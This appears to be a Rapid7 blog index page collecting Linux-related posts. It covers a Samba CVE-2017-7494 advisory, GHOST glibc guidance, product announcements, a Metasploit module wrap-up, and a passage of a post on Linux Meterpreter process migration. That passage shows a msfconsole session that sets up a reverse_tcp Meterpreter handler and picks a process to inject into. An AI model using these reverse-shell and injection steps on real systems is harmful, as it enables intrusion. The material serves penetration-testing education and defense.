Rapid7 Blog

Linux  

Patching CVE-2017-7494 in Samba: It's the Circle of Life

With the scent of scorched internet still lingering in the air from the WannaCry Ransomworm, today we see a new scary-and-potentially-incendiary bug hitting the twitter news. The vulnerability - CVE-2017-7494 - affects versions 3.5 (released March 1, 2010) and onwards of Samba, the defacto…

With the scent of scorched internet still lingering in the air from the WannaCry Ransomworm, today we see a new scary-and-potentially-incendiary bug hitting the twitter news. The vulnerability - CVE-2017-7494 - affects versions 3.5 (released March 1, 2010) and onwards of Samba, the defacto standard for providing Windows-based file and print services on Unix and Linux systems. Check out Samba's advisory for more details. We strongly recommend that security and IT teams take immediate action to protect themselves. Who is affected? Many home and corporate network storage systems run Samba and it is frequently installed by default on many Linux systems, making it possible that some users are running Samba without realizing it. Given how easy it is to enable Samba on Linux endpoints, even devices requiring it to be manually enabled will not necessarily be in the clear. Samba makes it possible for Unix and Linux systems to share files the same way Windows does. While the WannaCry ransomworm impacted Windows systems and was easily identifiable, with clear remediation steps, the Samba vulnerability will impact Linux and Unix systems and could present significant technical obstacles to obtaining or deploying appropriate remediations. These obstacles will most likely present themselves in situations where devices are unmanaged by typical patch deployment solutions or don't allow OS-level patching by the user. As a result, we believe those systems may be likely conduits into business networks. How bad is it? The internet is not on fire yet, but there's a lot of potential for it to get pretty nasty. If there is a vulnerable version of Samba running on a device, and a malicious actor has access to upload files to that machine, exploitation is trivial. In a Project Sonar scan run today, Rapid7 Labs discovered more than 104,000 internet-exposed endpoints that appear to be running vulnerable versions of Samba on port 445. Of those, almost 90% (92,570) are running versions for which there is currently no direct patch available. In other words, “We're way beyond the boundary of the Pride Lands.” (sorry - we promise that's the last Lion King reference. Maybe.) We've been seeing a significant increase in malicious traffic to port 445 since May 19th; however, the recency of the WannaCry vulnerability makes it difficult for us to attribute this directly to the Samba vulnerability. It should be noted that proof-of-concept exploit code has already appeared on Twitter, and we are seeing Metasploit modules making their way into the community. We will continue to scan for potentially vulnerable endpoints and will provide an update on numbers in the next few days. RESEARCH UPDATE – 5/25/17 – We have now run a scan on port 139, which also exposes Samba endpoints. We found very similar numbers to those for the scan of port 445. On port 139, we found approximately 110,000 internet-exposed endpoints running vulnerable versions of Samba. Of these, about 91% (99,645) are running older, unsupported versions of Samba (pre-4.4). What should you do to protect yourself? The makers of Samba have provided a patch for versions 4.4 onwards. A workaround for unsupported and vulnerable older versions (3.5.x to 4.4.x) is available, and that same workaround can also be used for supported versions that cannot upgrade. We also recommend that users of older, affected versions upgrade to a more recent, supported version of Samba (4.4 or later) and then apply the available patch. Organizations should be reviewing their official asset and configuration management systems to immediately identify vulnerable systems and then perform comprehensive and regular full network vulnerability scans to identify misconfigured or rogue systems. Additionally, organizations should review their firewall rules to ensure that SMB/Samba network traffic is not allowed directly from the internet to their assets. Many network-attached storage (NAS) environments are used as network backup systems. A direct attack or worm would render those backups almost useless, so if patching cannot be done immediately, we recommend creating an offline copy of critical data as soon as possible. In addition, organizations should be monitoring all internal and external network traffic for increases in connections or connection attempts to Windows file sharing protocols. How can Rapid7 help? We are working on checks for Rapid7 InsightVM and Rapid7 Nexpose so customers can scan their environments for vulnerable endpoints and take mitigating action as quickly as possible. We also expect a module in the Metasploit Framework very soon, enabling security professionals to test the effectiveness of their mitigations, and understand the potential impact of exploitation. We will notify users of the availability of these solutions as soon as they are available. PRODUCT UPDATE – 5/25/17 – We have authenticated checks available for Samba CVE-2017-7494 in Rapid7 InsightVM and Rapid7 Nexpose.  The authenticated checks relate to vendor-specific fixes as follows: ubuntu-cve-2017-7494 debian-cve-2017-7494 freebsd-cve-2017-7494 oracle_linux-cve-2017-7494 redhat_linux-cve-2017-7494 suse-cve-2017-7494 PRODUCT UPDATE 2 – 5/25/17 – We now have both authenticated and unauthenticated remote checks in Rapid7 InsightVM and Rapid7 Nexpose. In the unauthenticated cases we use anonymous or guest login to gather the required information, and on systems that are hardened against that kind of login, the authenticated remote check is available. Not a Rapid7 customer? Scan your network with InsightVM to understand the impact this vulnerability has on your organization. We also have a step-by-step guide on how to scan for Samba CVE-2017-7494 using our vulnerability scanners. PRODUCT UPDATE 3 - 5/25/17 - We now have a Metasploit module available for this vulnerability, so you can see whether you can be exploited via Samba CVE-2017-7494, and understand the impact of such an attack. Download Metasploit to try it out. P.S. yes, we know the lion is called Simba. But who doesn't love a gratuitous and tenuous cartoon lion reference?! Rowr.

Live Vulnerability Monitoring with Agents for Linux...and more

A few months ago, I shared news of the release of the macOS Insight Agent. Today, I'm pleased to announce the availability of the the Linux Agent within Rapid7's vulnerability management solutions. The arrival of the Linux Agent completes the trilogy that Windows and macOS…

A few months ago, I shared news of the release of the macOS Insight Agent. Today, I'm pleased to announce the availability of the the Linux Agent within Rapid7's vulnerability management solutions. The arrival of the Linux Agent completes the trilogy that Windows and macOS began in late 2016. For Rapid7 customers, all that really matters is you've got new capabilities to add to your kit. Introducing Linux Agents Take advantage of the Linux Agent to: Get a live view into your exposures: Automatically collect data from your endpoints and seamlessly update your Liveboards, which are always populated with real time data with out the need to hit refresh or rescan. Get visibility into remote workers: Remote workers rarely, or in some cases never, connect to the corporate network and often miss scheduled scan windows. Our lightweight agents can be deployed to monitor risks posed by the mobile workforce. Eliminate restricted asset blind spots: Some assets are just too critical to the business to be actively scanned. With our agents, you'll get visibility into assets with strict vulnerability scanning restrictions, while removing the need to manage credentials to gain access. Get visibility into elastic or ephemeral assets by building the Insight Agent into your base machine images or VM templates. Of course, Linux isn't a monolithic OS like Windows or macOS. In order for our customers to get the widest possible coverage, Linux Insight Agents support an array of distributions: Debian 7.0 - 8.2 CentOS 5.2 - 7.3 Red Hat Enterprise Linux (RHEL) Client 5.2 - 7.3 Red Hat Enterprise Linux (RHEL) Server 5.2 - 7.3 Red Hat Enterprise Linux (RHEL) Workstation 5.2 - 7.3 Oracle Enterprise Linux (OEL) Server 5.2 - 7.3 Ubuntu 11.04 - 16.10 Fedora 17 - 25 SUSE Linux Enterprise Server (SLES) 11 -12 SUSE Linux Enterprise Desktop (SLED) 11 -12 openSUSE LEAP (42.1 - 42.2) Amazon Linux With such a diverse list, we hope you're able to find a match for your environment. Ready to get started? Check out the steps to download and install, and you'll be up and running in no time. ...and more If you've read this far, you may be wondering: “Hey, what about the ‘...and more' promised in the title?” Since the release of Insight Agents for vulnerability management in late 2016, we've received great feedback from our customers. In particular, we heard that customers liked the visibility they were able to attain, but found the management capabilities lacking. With our most recent release, we've now brought management capabilities to your Assets with Agents. You can now treat your Assets with Agents just like any other asset in your system. You are now able to: Add Assets with Agents to groups Tag Assets with Agents Run standard reporting from the Console on Assets with Agents Correlate using Asset Linking Apply vulnerability exceptions All of your Assets with Agents will be synchronized from the Insight Platform into an automatically created “Rapid7 Insight Agents” site so you'll always know where to find them. I hope you grab a moment to give these new tools a spin and let us know what you think! All of our innovations are built side-by-side with our customers through the Rapid7 Voice program. Please contact your Rapid7 CSM or sales representative if you're interested in helping us make our products better. Download a free 30-day trial of InsightVM.

Now Officially Supporting Kali Linux 2.0

In August, we were getting a lot of questions about Kali 2. I have answered some questions in Metasploit on Kali Linux 2.0 blog post in the past. Today, I am pleased to announce that we extend our official platform support to three new…

In August, we were getting a lot of questions about Kali 2. I have answered some questions in Metasploit on Kali Linux 2.0 blog post in the past. Today, I am pleased to announce that we extend our official platform support to three new operating systems which are now listed in Metasploit System Requirements page:Kali Linux 2.0Red Hat Enterprise Server 7.1 or laterMicrosoft Windows Server 2012 R2Since we have added Kali 2 as a supported operating system, we no longer support Kali 1.x. Please note that these changes are applicable to our closed source products which are Metasploit Community, Express, Pro. Since Metasploit Framework is an open source and free tool, we do not provide support for it.Let me now try to cover some frequently asked questions:What is the difference between Rapid7 officially supported and not supported platforms?For every platform we list in our Metasploit System Requirements page, we perform automated testing before every release. Additionally, we perform full regression tests if we introduce a new feature. This ensures that we minimize the chance of introducing a defect. Beside from testing, we have a lab environment that includes each of the supported platforms so that when our customers report any issues, we can quickly reproduce those issues and address as soon as possible. Given these reasons, we highly recommend that you use a supported platform.Kali 2 already comes with Metasploit Framework, how does this change affect me?This announcement is only applicable to our closed source products which are Metasploit Community, Express, and Pro. Since Framework is an open source tool, we do not provide support for Metasploit Framework however you may still receive community support via IRC channel, and Rapid7 Community Discussions.Additionally, we have recently released Metasploit Framework Open Source Installers. If you wish to always stay on updated version of Metasploit Framework, feel free to use the open source installers.Kali 2 already comes with Metasploit Framework, can I still install Community, Express or Pro editions?Yes, Kali 2 comes with a Metasploit Framework version, however you can still install any of our closed source edition of Metasploit without any issues. As I mentioned above, Express and Pro editions are now fully supported on Kali 2. Once you install Community, Express, or Pro editions, you will realize that the packages will install into a complete different path, thus it will not overwrite Kali provided Framework edition. However, you will be able to use the command line provided with Pro edition without issues.Can I continue to use Kali 1.1?If you wish to continue using Kali 1.1, you certainly can. Please keep in mind that it is no longer supported and we do not perform tests on this platform anymore. Thus it is highly possible that some things may not work as expected.I have further questions, what do I do?Feel free to provide comment to this thread, or send us a tweet.Eray Yilmaz - @erayymzSr. Product Manager

Metasploit Framework Open Source Installers

Rapid7 has long supplied universal Metasploit installers for Linux and Windows. These installers contain both the open source Metasploit Framework as well as commercial extensions, which include a graphical user interface, metamodules, wizards, social engineering tools and integration with other Rapid7 tools. While these features…

Rapid7 has long supplied universal Metasploit installers for Linux and Windows. These installers contain both the open source Metasploit Framework as well as commercial extensions, which include a graphical user interface, metamodules, wizards, social engineering tools and integration with other Rapid7 tools. While these features are very useful, we recognized that they are not for everyone. According to our recent survey of Metasploit Community users, most only used it for the open source components, preferring to use the command-line tools over the graphical ones. Also, while we do our best to ensure that Metasploit Community and Pro releases are of high quality, they are not always supplied with the latest hot new exploits and payloads available in Metasploit Framework. While it has always been possible to simply setup a development environment and run the latest metasploit-framework code from github directly, it can still be tricky to setup and keep up to date. Kali Linux 2.0 now publishes the open source pieces of Metasploit Framework with its distribution, but the release schedule still follows that of Metasploit Community / Pro editions, and it of course does not necessarily help those who prefer other operating systems. To address the needs of open source enthusiasts, those needing more frequent updates, or those simply looking for an easy way to setup a database for Metasploit Framework development use, we have created Open Source installers for Metasploit Framework for Windows, OS X and Linux x86 and x86-64 platforms. These installers utilize the Omnibus tool from chef in order to package everything needed to run Metasploit Framework, from dependent libraries, specific Ruby versions up to a built-in PostgreSQL database. The installers are easy to install and get up and running in seconds. They are also built and tested automatically each night, so you can always run 'msfupdate' and get the latest exploits and payloads without having to setup a development environment. The installers also integrate with your OSes native package manager, be it Linux RPM or DEB-based, MSI for Windows or PKG for OS X. That makes them easy to uninstall as well. For information about how to install and use these new packages, see our wiki page on the Metasploit Framework project github project. The installers themselves are also open source. So if you see a problem, pull requests or issue reports are very welcome! Note that in addition to these Metasploit-specific installers, there are other ways to get Metasploit Framework, such as through Dave Kennedy's PenTester Framework or even pre-installed in Kali Linux. The Metasploit Framework omnibus installers provide another way to get the open source Metasploit Framework running on a variety of platforms quickly and easily.

Metasploit on Kali Linux 2.0

As you are aware, Kali 2.0 has been released this week and getting quite a bit of attention, as it should. Folks behind Kali have worked really hard to bring you the new version of Kali Linux that everyone is excited about. If you…

As you are aware, Kali 2.0 has been released this week and getting quite a bit of attention, as it should. Folks behind Kali have worked really hard to bring you the new version of Kali Linux that everyone is excited about. If you have already started to play with the new version, you probably have realized that something is different, that is; Metasploit Community / Pro is no longer installed by default. Where is Metasploit Community / Pro in Kali 2.0? Currently Kali 2.0 does not include commercial editions of Metasploit that are Community, Express and Pro versions. Kali 2.0 includes, by default, a version of Metasploit Framework. Why doesn't Kali 2.0 include Metasploit Community / Pro? Kali 2.0 is not yet officially supported by Rapid7 for our commercial versions of Metasploit. There were a lot of changes occurred in Kali 2.0, thus we need to make sure our commercial editions work as expected in the new Kali platform. We are working towards adding Kali 2.0 support soon. How can I install Metasploit Community / Pro on Kali 2.0? If you like to install latest version of Metasploit Community, Express, or Pro edition, you can absolutely do that by downloading the latest installer from Github: Metasploit Installers. Once you download the installer, please follow normal install procedure. We have verified that the latest installer will install and Metasploit will run without issues, however I must remind you that Kali 2.0 is not yet officially supported by Rapid7. Do I need to uninstall pre-installed Metasploit Framework? Due to the way we package commercial versions, installing Metasploit Community, Express, or Pro will not overwrite any Metasploit Framework packages provided by base install of Kali 2.0. Thus, it is not required to uninstall Kali provided Metasploit Framework packages. What if I upgrade from Kali 1.1 to 2.0? At this point, if you are planning on using any commercial edition of Metasploit on Kali 2.0, we strongly recommend a fresh install of Kali. I have further questions, what do I do? Feel free to provide comment to this thread, or send us a tweet. One last thing: It is because we have no call home functions in any Metasploit versions, it is really hard for us to know which version of Metasploit is being used on Kali. Thus, please take this one question survey to let us know which version of Metasploit you use on Kali. We really appreciate your response. Eray Yilmaz - @erayymz Sr. Product Manager

Weekly Metasploit Wrapup: Tons of Blogs, Kali Dev, and Nothing Suspicious Here

Blogsplosion! If you've been following along, you'll have noticed that we published just about a post a day here this week, which makes my job of bringing the weekly update to you, dear reader, that much easier. So, I'll keep this week's update pretty short.…

Blogsplosion! If you've been following along, you'll have noticed that we published just about a post a day here this week, which makes my job of bringing the weekly update to you, dear reader, that much easier. So, I'll keep this week's update pretty short. Here's a link farm covering what was discussed from Joe, OJ, sinn3r, and HD. They're all really fun and informative reads from fun and informative people, as you'd expect. Mozilla FireFox Proxy Prototype RCE Joe discusses a remote code execution vulnerability in Mozilla Firefox versions 31 through 34. Using Host Tagging in Metasploit for Penetration Testing sinn3r discusses a new-to-Framework feature that makes host tagging on engagements signficantly easier from the console. Deep Dive Into Stageless Meterpreter Payloads OJ discusses the new stageless Metepreter payloads, and why you might want to pick those rather than traditionally staged Meterpreter. Meterpreter Survey 2015 HD discusses the results of the Metepreter survey held in February, where we're going with payload development, and what you can do to help. Unicode Support in Meterpreter Brent discusses the storied history of character encoding, and why you needn't care about it any more in Meterpreter sessions. Kali Dev Docs Also this week, we're deepening our commitment to the Kali Linux user community by overhauling our Metasploit Development Environment Setup docs. If you're a habitual Kali hacker, we now have a pretty well documented means to get you up to speed with a modern Metasploit dev environment. It's been a long time coming, and replaces the old http://r-7.co/MSF-DEV wiki completely. Once the tires are sufficiently kicked on this collection of copy-pasta bashisms, we're going to get it all nicely packaged up as a one of those new-fangled DevOpsish deploy scripts, and it should work for pretty much any Debian-based distribution. No, it's not a DNS Hijack Finally, if all goes well over the next few days, you should see an entirely new platform for all our bloggery, discussion boards, and shameless trolling. You can see the note from Community Manager Maria Varmazis on the welcome page today. I'm pretty excited about the move, scheduled for March 31, 2015. What this all means for you is, when you get the password reset message from rapid7.com, you can rest assured that it's (probably) not a phishing attempt, a DNS hijack, or a timezone-agnostic April Fool's joke. It's really us, I swear. I mean, what's more convincing than an unsigned, unauthenticated, unsolicited reset request, pointing to a website that's running an entirely different backend from what you're accustomed to? Totes legit. (: In an effort to assure you that this is a real change and not a trick, I have signed this statement over on GitHub with my public key (as asserted by keybase.io). Feel free to verify it with your favorite GPG/PGP signature authentication scheme -- try curl that-raw-gist-link | gpg --verify. Of course, maybe this is all part of the ruse. There is really no end to paranoia, if you care to delve deep enough. New Modules Since the last Wrapup (diffs here), we have nine new modules: five exploits and four Post/Aux modules. Note that we've also renamed five WordPress-based exploit modules, so I've added those to a special section, since they will also appear to be "new." If you're using those in a scripted way, like a resource script or Task Chain or something, you'll want to update your script to pick the new ones. Otherwise, they're unchanged. Exploit modules Belkin Play N750 login.cgi Buffer Overflow by Marco Vaz and Michael Messner exploits CVE-2014-1635 Exim GHOST (glibc gethostbyname) Buffer Overflow by Qualys, Inc. exploits CVE-2015-0235 Firefox Proxy Prototype Privileged Javascript Injection by joev exploits CVE-2014-8636 Powershell Remoting Remote Command Execution by Ben Campbell exploits CVE-1999-0504 Auxiliary and post modules WordPress WP EasyCart Plugin Privilege Escalation by Rob Carr exploits CVE-2015-2673 WordPress WPLMS Theme Privilege Escalation by Evex and Rob Carr GitLab Login Utility by Ben Campbell GitLab User Enumeration by Ben Campbell Symantec Web Gateway Login Utility by sinn3r Renamed modules WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution by Sammy FORGIT and patrick exploits BID-53805 Wordpress InfusionSoft Upload Vulnerability by g0blin and us3r777 exploits CVE-2014-6446 WordPress cache_lastpostdate Arbitrary Code Execution by hdm and str0ke exploits CVE-2005-2612 WordPress OptimizePress Theme File Upload Vulnerability by Mekanismen and United of Muslim Cyber Army WordPress W3 Total Cache PHP Code Execution by juan vazquez, hdm, Christian Mehlmauer, and Unknown exploits CVE-2013-2010

GHOSTbuster: How to scan just for CVE-2015-0235 and keep your historical site data

A recently discovered severe vulnerability, nicknamed GHOST, can result in remote code execution exploits on vulnerable systems. Affected systems should be patched and rebooted immediately. Learn more about CVE-2015-0235 and its risks. The Nexpose 5.12.0 content update provides coverage for the GHOST vulnerability.…

A recently discovered severe vulnerability, nicknamed GHOST, can result in remote code execution exploits on vulnerable systems. Affected systems should be patched and rebooted immediately. Learn more about CVE-2015-0235 and its risks. The Nexpose 5.12.0 content update provides coverage for the GHOST vulnerability. Once the Nexpose 5.12.0 content update has been applied, built-in vulnerability scans will include checks for CVE-2015-0235. If you have regular scans set up to cover your network, they will now check for this vulnerability. Note that the Nexpose 5.12.0 product update is not required to scan for GHOST. Having the content update alone is sufficient. As of the Nexpose 5.12.0 product update, you can scan an existing site with a different template, and still keep the data from previous scans. If you need to determine as quickly as possible whether your assets are vulnerable to GHOST, you can create a scan template that will focus your scan on CVE-2015-0235 to the exclusion of anything else. Nexpose will check only for this vulnerability with this scan, but will retain data from previous scans about whether your assets were vulnerable to other exploits. To create the custom GHOST scan template, after the 5.12.0 update, take the following steps: Create a custom scan template. In the Web interface in the Sites section, click Edit to open the site configuration for the site you want to scan. On the Authentication tab, ensure the site is authenticating with Secure Shell (SSH). For guidance on permission elevation, see Elevating scan credentials in the Configuring scan credentials section of the Nexpose Help or User's Guide. In the Site Configuration, go to the Templates tab. In the Select Scan Template section, find the Full audit without Web Spider template, hover the mouse in the Copy column, and select the Copy icon. The Scan Template Configuration opens. Ensure the Vulnerabilities option is selected. Clear the Policies option. Edit the scan template name and description so you will be able to recognize later that the template is customized for CVE-2015-0235. Limit service discovery to port 22: In the Service Discovery section, set Ports to scan to Custom (only use “Additional ports”) and specify 22 for Additional ports. Limit host discovery to port 22: In the Asset Discovery section, specify only 22 for Send TCP Packets to ports and clear the checkbox for Send UDP packets to ports. The Send ICMP “pings” option can be set or not, without a major performance impact either way. Select only the relevant vulnerability checks. Go to the Vulnerability Checks page. First, you will disable all checks, check categories, and check types so that you can focus on scanning exclusively for CVE-2015-0235. Expand the By Category section and click Remove categories. Select the check box for the top row (Vulnerability Category), which will auto-select the check boxes for all categories. Then click Save. Note that 0 categories are now enabled. Expand the By Check Type section and click Remove check types. Select the check box for the top row (Vulnerability Check Type), which will auto-select the check boxes for all types. Then click Save. Note that 0 check types are now enabled. Expand the By Individual Check section and click Add checks. Enter or paste CVE-2015-0235 in the Search Criteria box and click Search. Select the check box for the top row (Vulnerability Check), which will auto-select the check boxes for all types. Then click Save. Save the scan template. Schedule your scan In the Schedule tab, select Create Schedule. Ensure that Enable Schedule is checked. Specify a start time and date – to get started right away, specify the current date and a time a few minutes in the future. Select your new scan template. If you only want to run this scan once, clear the Repeat scan every checkbox. Click Save. Once your scan has run, you will see the results of all scans in the scan history for the site. The vulnerabilities and risk score for each asset will reflect the most recent check for a given vulnerability, giving you a thorough picture of your risk based on this specific scan and your historical scans of that site. You can create a report specific to the GHOST vulnerability so you can focus your remediation. Learn more and get the queries needed to create the report in this page.

GHOST in the Machine - Is CVE-2015-0235 another Heartbleed?

CVE-2015-0235 is a remote code execution vulnerability affecting Linux systems using older versions of the GNU C Library (glibc versions less than 2.18). The bug was discovered by researchers at Qualys and named GHOST in reference to the _gethostbyname function (and possibly because it…

CVE-2015-0235 is a remote code execution vulnerability affecting Linux systems using older versions of the GNU C Library (glibc versions less than 2.18). The bug was discovered by researchers at Qualys and named GHOST in reference to the _gethostbyname function (and possibly because it makes for some nice puns). To be clear, this is NOT the end of the Internet as we know, nor is it further evidence (after Stormaggedon) that the end of the world is nigh. It's also not another Heartbleed. But it is potentially nasty and you should patch and reboot your affected systems immediately. What's affected? Linux-based appliances from a variety of vendors are going to be impacted, though as with most library-level vulnerabilities, the attack surface is still largely unknown. If you use Linux-based appliances, check with your vendor to determine whether an update is available and needs to be applied. glibc is a core component of Linux used to implement C libraries. The vulnerability impacts most Linux distributions released between November 10, 2000 and mid-2013. This means that, similarly to Heartbleed, it affects a wide range of applications that happen to call the vulnerable API. The bug was fixed in 2013, but wasn't flagged as a security issue at the time (or since until now), so vendors using older branches of glibc didn't update the library. We recommend that you apply the latest patches available from your vendor and reboot the patched machine. Applying the update without a reboot may leave vulnerable services exposed to the network. How bad is it? Successful exploitation of this vulnerability can result in remote code execution, so it has the potential to be pretty bad. This issue can also be exploited locally in some cases, allowing an unprivileged user to gain additional access. In contrast to a vulnerability like Heartbleed, this issue is not always exploitable. In fact, in a general sense, this is not an easy bug to exploit. Only one easily-exploitable case has been identified so far, though that may change as additional information comes to light.The one already identified is the Exim mail server. An attacker could abuse this vulnerability to execute arbitrary commands on an unpatched server. How can you test for it? This issue is difficult to test for, as the full attack surface is not yet known. As mentioned, the Exim mail server is one example of a vulnerable service and it is possible to test for the issue remotely, without authentication. In general, we recommend using a credentialed vulnerability scan to identify unpatched systems. Qualys says that they plan to release a Metasploit module targeting the Exim mail server – thank you – however, please note that this exploit depends on a non-default configuration being selected. The Nexpose update (5.12.0) scheduled for release tomorrow (Wednesday, Jan 28) will include a check for this vulnerability in relevant RHEL, CentOS, Ubuntu, Debian and SUSE distributions. What should you do about it? Patch immediately and reboot. Without a reboot, services using the old library will not be restarted. Ubuntu versions newer than 12.04 have already been upgraded to a non-vulnerable glibc library. Older Ubuntu versions (as well other linux distributions) are still using older versions of glibc and are either waiting on a patch or a patch is already available. Are Rapid7 solutions impacted by this? Our native code does not use the vulnerable function call, so the solutions themselves are not affected.  However, if you are running Nexpose on an Ubuntu 12.04-based appliance, it is vulnerable, and we are investigating whether it can be exploited remotely and will provide an update. Again, we recommend patching immediately, and it's always sensible to ensure systems are not accessible from the public-facing internet unless they have to be. UserInsight used some of the impacted libraries.  Again, we know of no way that this could be remotely exploited but we are redeploying immediately based on a patched version of glibc. If you have any questions about this bug, please let us know. ~ @infosecjen

12 Days of HaXmas: Meterpreter migration for Linux!

This post is the eleventh in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014. Hello everyone and Happy HaXmas (again) and New Year! On this…

This post is the eleventh in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014. Hello everyone and Happy HaXmas (again) and New Year! On this HaXmas I would like to share with all you a new feature which I'm personally very happy with. It's nothing super new and has limitations, but it's the first meterpreter feature where I've been collaborating I feel really happy of sharing it with all you: support to migrate the Linux meterpreter payload. Before going ahead, let me clarify something, as you can read on the meterpreter github page: For some value of "working." Meterpreter in POSIX environments is not considered stable. It does stuff, but expect occasional problems. Unfortunately it applies to the process migration feature too :. So be careful when using linux meterpreter and this feature on your pentest! You can experience reliability problems :\ Hopefully these lines also will help to explain limitations and how to use the feature! Requirement #1: From memory First of all, linux migrate tries to be "imitate" the windows migrate behavior. It means there is an important requirement, migration should happen from memory, without dropping meterpreter to disk. On windows it's accomplished with the well-known OpenProcess, WriteProcessMemory, CreateRemoteThread, etc. IPC APIs. But these aren't available on Linux, where we decided to use the "ptrace" interface to modify a process memory, registers and control execution. Unfortunately, it introduces the first caveats: On modern Linux distributions, ptrace restrictions use to apply, so migration isn't always possible. Once the meterpreter code is injected in the target process, original process execution is replaced. It means the target process won't do its original task anymore, once migration has been accomplished. That said, how to use it? On older systems, where ptrace limitations are not in use, say for example Ubuntu 10.04 (32 bits), the migration usage is straightforward. It's something like that: Get a meterpreter session on your target: msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp PAYLOAD => linux/x86/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 172.16.55.1 LHOST => 172.16.55.1 msf exploit(handler) > exploit [*] Started reverse handler on 172.16.55.1:4444 [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(100 bytes) [*] Sending stage (1142784 bytes) to 172.16.55.1 [*] Meterpreter session 1 opened (172.16.55.1:4444 -> 172.16.55.1:54901) at 2014-12-31 10:43:02 -0600 meterpreter > getuid Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 meterpreter > sysinfo Computer : ubuntu OS : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 (i686) Architecture : i686 Meterpreter : x86/linux meterpreter > Use the ps command to find a target process. There are some things to remember: The session user must own the target process. Use interruptible (or running) processes as targets. The target process won't do its original task after migration. Remember which linux meterpreter is only available on 32 bits, so even when running on a 64 bits system, the meterpreter process will be a 32 bits one. And the migration target process must be a 32 bits one too. meterpreter > ps -U juan Filtering on user name... Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 1894 1 gnome-keyring-d 0 juan /usr/bin/gnome-keyring-daemon --daemonize --login 1912 1220 gnome-session 0 juan gnome-session 1946 1912 ssh-agent 0 juan /usr/bin/ssh-agent /usr/bin/dbus-launch --exit-with-session gnome-session 1949 1 dbus-launch 0 juan /usr/bin/dbus-launch --exit-with-session gnome-session 1950 1 dbus-daemon 0 juan /bin/dbus-daemon --fork --print-pid 5 --print-address 7 --session 1953 1 gconfd-2 0 juan /usr/lib/libgconf2-4/gconfd-2 1960 1 gnome-settings- 0 juan /usr/lib/gnome-settings-daemon/gnome-settings-daemon 1962 1 gvfsd 0 juan /usr/lib/gvfs/gvfsd 1970 1 gvfs-fuse-daemo 0 juan /usr/lib/gvfs//gvfs-fuse-daemon /home/juan/.gvfs 1971 1 vmtoolsd 0 juan /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr --blockFd 3 1972 1912 polkit-gnome-au 0 juan /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1 1975 1912 gnome-panel 0 juan gnome-panel 1978 1912 metacity 0 juan metacity --replace 1981 1912 nm-applet 0 juan nm-applet --sm-disable 1983 1 pulseaudio 0 juan /usr/bin/pulseaudio --start --log-target=syslog 1984 1912 nautilus 0 juan nautilus 1985 1912 gnome-power-man 0 juan gnome-power-manager 1986 1912 bluetooth-apple 0 juan bluetooth-applet 1995 1983 gconf-helper 0 juan /usr/lib/pulseaudio/pulse/gconf-helper 2020 1 gvfs-gdu-volume 0 juan /usr/lib/gvfs/gvfs-gdu-volume-monitor 2025 1 bonobo-activati 0 juan /usr/lib/bonobo-activation/bonobo-activation-server --ac-activate --ior-output-fd=19 2028 1 gvfs-gphoto2-vo 0 juan /usr/lib/gvfs/gvfs-gphoto2-volume-monitor 2031 1 gvfsd-trash 0 juan /usr/lib/gvfs/gvfsd-trash --spawner :1.6 /org/gtk/gvfs/exec_spaw/0 2032 1 gvfs-afc-volume 0 juan /usr/lib/gvfs/gvfs-afc-volume-monitor 2045 1 wnck-applet 0 juan /usr/lib/gnome-panel/wnck-applet --oaf-activate-iid=OAFIID:GNOME_Wncklet_Factory --oaf-ior-fd=18 2046 1 trashapplet 0 juan /usr/lib/gnome-applets/trashapplet --oaf-activate-iid=OAFIID:GNOME_Panel_TrashApplet_Factory --oaf-ior-fd=24 2054 1 clock-applet 0 juan /usr/lib/gnome-panel/clock-applet --oaf-activate-iid=OAFIID:GNOME_ClockApplet_Factory --oaf-ior-fd=21 2055 1 notification-ar 0 juan /usr/lib/gnome-panel/notification-area-applet --oaf-activate-iid=OAFIID:GNOME_NotificationAreaApplet_Factory --oaf-ior-fd=30 2058 1 indicator-apple 0 juan /usr/lib/indicator-applet/indicator-applet-session --oaf-activate-iid=OAFIID:GNOME_FastUserSwitchApplet_Factory --oaf-ior-fd=36 2059 1 indicator-apple 0 juan /usr/lib/indicator-applet/indicator-applet --oaf-activate-iid=OAFIID:GNOME_IndicatorApplet_Factory --oaf-ior-fd=42 2075 1 gvfsd-metadata 0 juan /usr/lib/gvfs/gvfsd-metadata 2076 1 indicator-me-se 0 juan /usr/lib/indicator-me/indicator-me-service 2078 1 indicator-messa 0 juan /usr/lib/indicator-messages/indicator-messages-service 2097 1 indicator-sessi 0 juan /usr/lib/indicator-session/indicator-session-service 2098 1 indicator-appli 0 juan /usr/lib/indicator-application/indicator-application-service 2099 1 indicator-sound 0 juan /usr/lib/indicator-sound/indicator-sound-service 2109 1 gvfsd-burn 0 juan /usr/lib/gvfs/gvfsd-burn --spawner :1.6 /org/gtk/gvfs/exec_spaw/1 2112 1 gnome-terminal 0 juan gnome-terminal 2114 1 gnome-screensav 0 juan gnome-screensaver 2115 2112 gnome-pty-helpe 0 juan gnome-pty-helper 2116 2112 bash 0 juan bash 2147 1912 gdu-notificatio 0 juan /usr/lib/gnome-disk-utility/gdu-notification-daemon 2159 1912 evolution-alarm 0 juan /usr/lib/evolution/2.28/evolution-alarm-notify 2160 1912 python 0 juan python /usr/share/system-config-printer/applet.py 2168 1912 update-notifier 0 juan update-notifier 2310 2112 bash 0 juan bash 2745 1 notify-osd 0 juan /usr/lib/notify-osd/notify-osd 2846 2112 bash 0 juan bash 2989 1 gvim 0 juan gvim 2991 2112 bash 0 juan bash 3378 1 [gedit] <defunct> 0 juan 5965 2846 gdb 0 juan gdb /bin/ls 17323 2991 [dummy] <defunct> 0 juan 18063 2310 msf.elf 0 juan ./msf.elf 18084 1 gcalctool 0 juan gcalctool 23799 1 [gedit] <defunct> 0 juan On the case above the "gcalctool" process looks like a good candidate for this DEMO. Of course, wouldn't be the best candidate on a real intrusion, since probably the calculator won't have a long live. The 